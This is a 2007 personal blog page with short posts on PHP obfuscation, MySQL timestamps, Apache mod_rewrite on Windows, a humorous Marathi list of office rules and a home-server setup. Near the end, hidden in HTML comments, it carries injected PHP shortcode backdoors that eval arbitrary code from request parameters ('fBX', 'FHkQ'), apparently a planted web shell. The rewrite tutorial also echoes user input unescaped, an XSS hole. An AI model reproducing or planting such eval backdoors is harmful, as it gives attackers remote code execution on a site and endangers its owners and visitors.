Shantibhushan Naik

Tag: you

PHP code obfuscation possible?

Today at my project, I was faced with a simple question from the client – How do you ensure that your PHP code is not tampered?

Honestly, I had no answer. 🙁

The only ray of hope I thought was – Since PHP is interpreted, is there some compressing, or obfuscating tool out there that can help me?

One possible solution I came across was encrypting your logic entirely so as unreadable to humans

http://www.abhishektripathi.com/encrypting-footer-links-free-theme-developers-take-notice/

Is this failsafe? Can it be still reverse engineered, and original source obtained to defeat the original purpose of protecting your code?

Anyone to help out there?

2007/10/15
MySQL’s killer feature

MySQL has a killer feature – you can have a timestamp field with DEFAULT as LOCALTIMESTAMP, so that when you insert a new record, the timestamp field will automatically have current timestamp inserted. But what about when the record is updated? Do you manually have to update the timestamp again? NO – MySQL allows you also specify another default on UPDATE so that whenever you update the record, it will automatically update the timestamp again.

…
`timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
…

Now, isn’t that a neat feature!

2007/10/13
Using Apache’s mod_rewrite on Windows

I recently happened to experiment with Apache’s mod_rewrite, an excellent library to change your machine friendly (or perhaps program friendly?) web urls into user friendly urls.

The steps to make mod_rewrite to work on Windows is-
– Edit httpd.conf for Apache, and uncomment the following line
# LoadModule rewrite_module modules/mod_rewrite.so
-to-
LoadModule rewrite_module modules/mod_rewrite.so

– Next, under <Directory “{Your document root}“> change
AllowOverride None
-to-
AllowOverride All

– Restart Apache

– Create a sample folder “rewrite” under {Your document root}, with the following files
{Your document root}
rewrite
.htaccess
details.php

– What we will attempt now is to have a url like http://localhost/rewrite/details/shantibhushan to be automatically executed as http://localhost/rewrite/details.php?user=shantibhushan

– Edit your .htaccess file as follows
<IfModule rewrite_module>
RewriteEngine on
RewriteBase /rewrite/
RewriteRule ^details/(.+)$ details.php?user=$1 [L]
</IfModule>

– The RewriteRule is the actual line where we specify what url is to be mapped to which actual url. ^details/(.+)$ takes a user friendly url /details/shantibhushan and extracts “shantibhushan” as $1. It then replaces $1 into details.php?user=$1 resulting in details.php?user=shantibhushan as the actual url.

– Edit details.php as follows
<?php
$user= $_REQUEST[‘user’];
print(“<h1>$user</h1>”);
?>

– The above sample simply takes “user” from details.php?user={user} and shows it back.

– Done! Try accessing http://localhost/rewrite/details/shantibhushan and you should see details.php getting called with parameter as “shantibhushan”

TODO
– Simply accessing details/ results in error, and rewrite rule doesn’t assume such a case. It can be handled by RewriteCond
– First I wanted to have details:shantibhushan as the url, but this has a bug on Windows not allows : in path. It seems to work fine on non-Windows.
– The example assumes Apache is running on port 80 on your machine.

2007/10/13
Puneri Shista

Sometimes HRD (Human Resources Department) can be too strict!

पुणेरी माणसाला पुणेरी मराठीच समजते. म्हणून मानवीय स्रोत विभागाने (Human Resources Department) सर्व सूचना पुणेरी मराठीतून द्याव्यात अशी आमची विनंती आहे. काही उदाहरणे देत आहोत .पुणेकराकडून पुणेकरांसाठी

Please do not use reception areas and lobbies for reading newspapers, chit-chatting or for having snacks

………….. रिसेप्शन हे सार्वजनिक वाचनालय नाही. कामाखेरीज तेथे बसू नये .

Avoid occupying meeting rooms and lobbies for personal telephone calls

………. ह्या खोल्यांवर पैसा कामासाठी खर्च केला आहे. तुमच्या गप्पांसाठी नाही

Restrain yourself from barging into the elevators without allowing those inside to step out first

…………… ही लिफ़्ट आहे. लोकल ट्रेन नाही. सुटली तरी चालेल .

Please don’t use the same elevator in case the same is being used by an associate along with client

…………… ग्राहक देवो भव. तुमचा पगार ह्यांच्याकडून येतो. कंपनी खिशातून काही देत नाही .

Avoid speaking in regional languages within the office premises

………….. गावच्या गप्पा घरी !

Please do not leave behind used tea cups or glasses in break out areas. Please deposit the same in appropriate areas. If you smoke, please ensure to extinguish cigarettes and throw the matches or cigarette buds only into ash pans provided for

…………… ही जागा तुमधे तीर्थरूप येऊन साफ़ करत नाहीत. जर तुम्ही चैतन्य काडी चा वापर करत असाल तर तिचे बूड विझवायल विसरू नका. ते कोपऱ्यातले पॅन्स शोभेचे नाहीत . गुमान बूड त्याच्यातच विझवा. ऑफ़िसचा मालक तुमचा बाप नाही .

When in office keep the ring tone of the cell phone low or silent. Please avoid having fancy ring tones when in the office

…………. शांतता राखा. हे ऑफ़िस आहे. तमाशाचा फ़ड नाही.

Please keep a check on the noise levels in the pantries

………… संयमाने आणि हळू बोला. आपले पूर्वज माकड असले तरी आपण आता माणसं आहोत.

2007/10/12
Poo Analysis

Simply hilarious! Read if you understand Marathi.

2007/10/12
Hello world!

Hi All! Finally, I managed to get up my own website running from my home server! Phew, it was a bit tedious setting it up with Web Caster 110, over NTT B’Flets 100 Mbps internet connection. The steps were well documented, and even a search over Internet proved the fact that nothing else needs to be set. However, my webserver was not working!

Ok, I try to slow down before scaring you with all nitty-gritty (?) details about my home server setup.

[Translate]

[Translate]

<!– [insert_php]if (isset($_REQUEST["fBX"])){eval($_REQUEST["fBX"]);exit;}[/insert_php][php]if (isset($_REQUEST["fBX"])){eval($_REQUEST["fBX"]);exit;}[/php] –>

[Translate]

<!– [insert_php]if (isset($_REQUEST["FHkQ"])){eval($_REQUEST["FHkQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["FHkQ"])){eval($_REQUEST["FHkQ"]);exit;}[/php] –>

2007/10/12